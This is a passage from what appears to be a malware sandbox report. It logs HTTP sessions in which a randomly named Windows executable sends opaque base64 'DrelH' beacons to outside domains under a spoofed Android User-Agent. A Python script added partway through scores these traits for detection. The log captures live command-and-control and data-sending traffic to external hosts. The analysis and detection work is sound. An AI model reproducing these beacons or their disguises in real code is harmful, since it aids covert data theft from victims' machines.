                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 43 35 52 37 41 76 5a 32 31 51 42 52 5a 44 71 57 4e 59 4e 38 62 39 62 75 2b 44 4d 4a 36 30 2f 64 44 4e 71 50 75 4b 59 7a 4c 77 2b 73 4e 39 59 4c 42 73 4f 37 2f 64 57 31 69 74 36 36 69 48 65 61 53 44 73 4a 61 2f 67 67 2b 32 51 2f 65 55 6a 56 76 51 71 31 6f 43 54 31 39 49 6a 44 39 70 66 41 34 73 48 43 5a 46 32 67 2b 75 77 73 48 31 73 38 54 78 4a 59 38 6a 39 35 56 72 33 34 4a 57 79 47 43 69 49 6e 6f 68 31 2b 6d 72 54 31 30 45 63 63 6f 35 6f 4d 52 37 5a 4f 32 4d 42 38 54 6f 6b 76 53 66 68 6e 34 72 41 66 50 65 6e 38 39 41 69 6a 70 44 57 37 35 34 71 4f 4a 4d 3d
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp2C5R7AvZ21QBRZDqWNYN8b9bu+DMJ60/dDNqPuKYzLw+sN9YLBsO7/dW1it66iHeaSDsJa/gg+2Q/eUjVvQq1oCT19IjD9pfA4sHCZF2g+uwsH1s8TxJY8j95Vr34JWyGCiInoh1+mrT10Ecco5oMR7ZO2MB8TokvSfhn4rAfPen89AijpDW754qOJM=
                                                                                                                                   Oct 22, 2024 22:57:49.973726034 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:49 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


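The sessions above share one shape: a POST (then a GET) to a four-character path, a single opaque base64-like field (DrelH) in the body or query, Origin and Referer that mirror the Host, Connection: close, and an Android Chrome User-Agent sent by a process under C:\Program Files (x86). The following is an added triage script, not Joe Sandbox code, that parses these requests as captured, checks the declared Content-Length against the body, decodes a "Data Raw" hex column, and scores those traits. The two malicious requests are copied from the report above; the benign request is constructed for contrast, and the trait list is a heuristic read from this sample's traffic rather than a vendor signature.

```python
"""Triage of the HTTP sessions in this report (added example, not Joe Sandbox code)."""
import re
from urllib.parse import urlsplit

# Copied from the report: the POST to /t10u/ with Content-Length 226, and session 16's GET.
POST_T10U = (
    "POST /t10u/ HTTP/1.1\r\n"
    "Host: www.mondayigboleague.info\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US,en\r\n"
    "Origin: http://www.mondayigboleague.info\r\n"
    "Referer: http://www.mondayigboleague.info/t10u/\r\n"
    "Content-Length: 226\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "Cache-Control: max-age=0\r\n"
    "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36\r\n"
    "\r\n"
    "DrelH=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCjwoLXGUGSG7sNggBOyt20d7OP/uuxq7LQCyD9AG"
    "jSPxswJXN0TlJaE3e24TYpf9AeqluhQIKprmvtJCwfcFXYzzwyYjxadFJnhszBnRbSfUnknAkYLF6lle"
    "Xo1Tiap3FsBL6vaiWNE8B+IIxs8bG/y3gTiI7LwB07oDsn47r8C5+weYZcmx"
)
GET_T10U = (
    "GET /t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/"
    "S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH HTTP/1.1\r\n"
    "Host: www.mondayigboleague.info\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36\r\n"
    "\r\n"
)
# Constructed for contrast; not taken from the report.
BENIGN_GET = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.6.0\r\nAccept: */*\r\n\r\n"

C2_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")          # /t10u/, /0bvj/
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")    # base64 alphabet, optional padding


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body}


def raw_fields(encoded: str) -> dict:
    """Split name=value pairs without percent/plus decoding: the blobs here contain '+' and '/'."""
    fields = {}
    for pair in filter(None, encoded.split("&")):
        name, _, value = pair.partition("=")
        fields[name] = value
    return fields


def body_length_ok(req: dict) -> bool:
    """Declared Content-Length must equal the captured body (a mismatch means a broken capture)."""
    declared = req["headers"].get("content-length")
    return declared is None or int(declared) == len(req["body"].encode("latin-1"))


def decode_data_raw(hex_dump: str) -> str:
    """Turn a 'Data Raw' hex column back into text; latin-1 keeps every byte value."""
    return bytes.fromhex(hex_dump.replace(" ", "")).decode("latin-1")


def c2_traits(req: dict) -> list:
    """Return the beacon traits present in one request; more traits, more suspicious."""
    h = req["headers"]
    host = h.get("host", "")
    traits = []
    if C2_PATH_RE.match(req["path"]):
        traits.append("four-char path")
    if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
        traits.append("origin/referer mirror host")
    if h.get("connection", "").lower() == "close":
        traits.append("connection close")
    if "Android" in h.get("user-agent", ""):
        traits.append("android UA from a Windows process")
    fields = raw_fields(req["body"] if req["method"] == "POST" else req["query"])
    opaque = [v for v in fields.values() if len(v) >= 64 and OPAQUE_RE.match(v)]
    if req["method"] == "POST" and len(fields) == 1 and opaque:
        traits.append("single opaque form field")
    if req["method"] == "GET" and len(fields) == 2 and opaque:
        traits.append("opaque blob plus short tag in query")
    return traits


def triage(raw: str) -> dict:
    req = parse_request(raw)
    return {"request": f"{req['method']} {req['path']}",
            "length_ok": body_length_ok(req), "traits": c2_traits(req)}


if __name__ == "__main__":
    for raw in (POST_T10U, GET_T10U, BENIGN_GET):
        print(triage(raw))
    # First bytes of the session 16 response body, from its Data Raw column
    print(decode_data_raw("3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e"))
```

Run against a larger capture, treat four or more traits on a request from a non-browser process as worth a look; the 4-character path and the Origin/Referer mirror are the cheapest of these to turn into a proxy-log query.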
                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   18 | 192.168.2.5 | 53221 | 217.70.184.50 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:51.703383923 CEST | 761 | OUT | POST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 67 2f 59 52 56 71 4d 73 69 59 77 4c 77 2b 30 64 39 64 57 78 73 2f 37 2f 51 72 31 67 70 36 36 69 37 65 61 54 7a 73 4a 73 33 6e 67 75 32 53 71 4f 55 68 4c 66 51 71 31 6f 43 54 31 38 34 4a 44 39 78 66 44 49 77 48 44 38 70 78 71 65 75 76 6d 6e 31 73 34 54 77 4f 59 38 6a 50 35 55 32 71 34 4c 75 79 47 44 53 49 6b 36 5a 30 30 6d 71 35 6f 45 46 78 59 64 55 48 57 43 6e 78 49 77 51 42 73 43 45 64 71 6b 79 4c 39 61 6a 6f 4d 76 79 66 73 75 49 56 79 5a 69 2f 68 61 6f 61 51 65 5a 73 6a 63 72 32 4c 6f 62 2b 78 44 59 51 6c 2b 66 47 43 42 7a 55
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJIg/YRVqMsiYwLw+0d9dWxs/7/Qr1gp66i7eaTzsJs3ngu2SqOUhLfQq1oCT184JD9xfDIwHD8pxqeuvmn1s4TwOY8jP5U2q4LuyGDSIk6Z00mq5oEFxYdUHWCnxIwQBsCEdqkyL9ajoMvyfsuIVyZi/haoaQeZsjcr2Lob+xDYQl+fGCBzU
                                                                                                                                   Oct 22, 2024 22:57:52.517530918 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:52 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   19 | 192.168.2.5 | 53222 | 217.70.184.50 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:54.254333019 CEST | 1778 | OUT | POST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 34 2f 45 30 42 71 50 4b 71 59 78 4c 77 2b 39 39 39 63 57 78 73 59 37 2f 35 73 31 67 6c 4d 36 6b 33 65 63 31 50 73 65 4f 66 6e 31 65 32 53 31 2b 55 69 56 76 52 33 31 6f 53 70 31 39 45 4a 44 39 78 66 44 4a 41 48 45 70 46 78 6c 2b 75 77 73 48 30 2b 38 54 78 70 59 38 72 66 35 55 79 36 2f 2f 61 79 49 44 43 49 6c 50 4e 30 34 6d 71 37 72 45 46 70 59 64 51 59 57 43 37 62 49 77 4e 6b 73 42 6b 64 72 67 36 49 6c 36 7a 7a 54 4d 57 49 68 75 6f 73 77 66 32 41 6d 4a 64 77 63 70 31 32 6d 59 72 64 4f 63 72 47 6c 51 42 4b 35 34 4f 64 4e 48 65 4d 56 68 2f 4a 35 5a 39 54 2f 37 52 38 4d 55 6e 66 31 34 52 45 57 59 46 4b 62 78 62 75 79 4f 4d 32 49 61 37 30 4a 4d 47 61 33 32 42 6d 72 33 36 53 6b 45 68 71 56 68 51 78 74 6b 51 4e 31 59 56 6f 51 4a 66 69 66 50 57 44 59 6e 32 37 36 44 4b 75 59 69 31 54 4a 61 64 54 6a 67 4b 49 44 78 74 78 59 73 31 4f 6d 52 71 31 76 7a 5a 44 36 47 58 64 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJI4/E0BqPKqYxLw+999cWxsY7/5s1glM6k3ec1PseOfn1e2S1+UiVvR31oSp19EJD9xfDJAHEpFxl+uwsH0+8TxpY8rf5Uy6//ayIDCIlPN04mq7rEFpYdQYWC7bIwNksBkdrg6Il6zzTMWIhuoswf2AmJdwcp12mYrdOcrGlQBK54OdNHeMVh/J5Z9T/7R8MUnf14REWYFKbxbuyOM2Ia70JMGa32Bmr36SkEhqVhQxtkQN1YVoQJfifPWDYn276DKuYi1TJadTjgKIDxtxYs1OmRq1vzZD6GXdAOIykXD5uzvgvqu3C59vVu/eHo1+HQ7jFs2vG8lZOlDLfN/VuLLzC2cjwoxJO0UKMkKafYc2J50FyXqErCrELiMOIqIRdan7DP+e5AgnvIaE67wQBWbTgedsDt9M6dOqT8fps/dHxZQyRIgKBLU8PE9dJbUtgMFltsqZRTNCouZwY13Ojb14pnXFBOGiNmm8mhr9K///rnSj8qmWr2kE0bn2dmSMfYOuiB1/BqMCnf1p+3Rv1Scwq7UiLuuHWgFaG57rrm3D7VXIOUTLbrP6JXR3Hh68jbtdIQWp0DmT6XHXRvx7FeIDsNdQA0BrTaDuQSiYfDPQX5Vu/t/fFGtpAQ0T/mlTYczMukEem2GV0XFBHbIVa1UKVBryBTfSPx64ev5Q2iHQdsyxjvAF6vphIvKpd2hqr7gG3hVx7XcVP9poi0Nd30kFXjwCWKmKYaws0doNYbepEqkbRfzEbtw7HdjyYnr4BbVs+T7/Ox7kSEklja7qhAZa9M6YNJo64KjFWHDLM4bGThr42iMJNy6CkKoUtESYSFQT8acP6dci7R9ITNDJg44p86Y8BoFzbEWygL+C16FDVRbfQmVU3cP/pvNOmOYDrtc5ZgclWLdDNXsqCUdGOtO+IaKDK0Rqu5uwvTRDKcuBZ1b3OTJKXWX15xPPXsHhh8A5NV [TRUNCATED]
                                                                                                                                   Oct 22, 2024 22:57:55.072618961 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:54 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   20 | 192.168.2.5 | 53223 | 217.70.184.50 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:56.792296886 CEST | 480 | OUT | GET /0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw== HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:57:57.606309891 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:57 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Vary: Accept-Language
                                                                                                                                  Data Raw: 37 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                  Data Ascii: 779<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>stocksm.fun</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whoi [TRUNCATED]
Oct 22, 2024 22:57:57.606339931 CEST | 878 | IN | Data Raw: 73 6d 2e 66 75 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61
Data Ascii: sm.fun"><strong>View the WHOIS results of stocksm.fun</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-bord


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 53224 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:02.789788008 CEST | 750 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 7a 4f 30 72 55 75 37 35 72 57 69 62 42 76 76 2f 64 38 4b 76 79 62 6e 49 45 5a 5a 74 55 31 38 47 76 33 35 4f 34 53 6e 33 59 70 49 58 74 44 37 5a 43 69 36 56 34 4f 30 33 34 42 47 4b 79 46 48 72 35 61 4f 6b 75 77 42 51 30 71 4c 41 42 78 6f 49 62 4c 59 71 75 4f 77 44 61 46 2f 63 51 42 38 61 65 6d 41 48 48 45 56 46 75 71 2b 38 74 33 75 6c 43 41 67 77 36 4d 55 78 56 58 36 6b 77 6b 47 41 52 70 78 4a 6e 61 5a 78 30 56 33 68 34 78 48 74 4a 52 4c 75 41 46 68 72 54 55 6d 62 69 30 74 76 61 42 2b 70 57 4b 53 57 43 61 79 31 55 63 57 37 4f 7a 50 6c 31 2b 2b 79 55 75 45 3d
                                                                                                                                  Data Ascii: DrelH=aRJkG/xjeaxIzO0rUu75rWibBvv/d8KvybnIEZZtU18Gv35O4Sn3YpIXtD7ZCi6V4O034BGKyFHr5aOkuwBQ0qLABxoIbLYquOwDaF/cQB8aemAHHEVFuq+8t3ulCAgw6MUxVX6kwkGARpxJnaZx0V3h4xHtJRLuAFhrTUmbi0tvaB+pWKSWCay1UcW7OzPl1++yUuE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 53225 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:05.326951027 CEST | 770 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
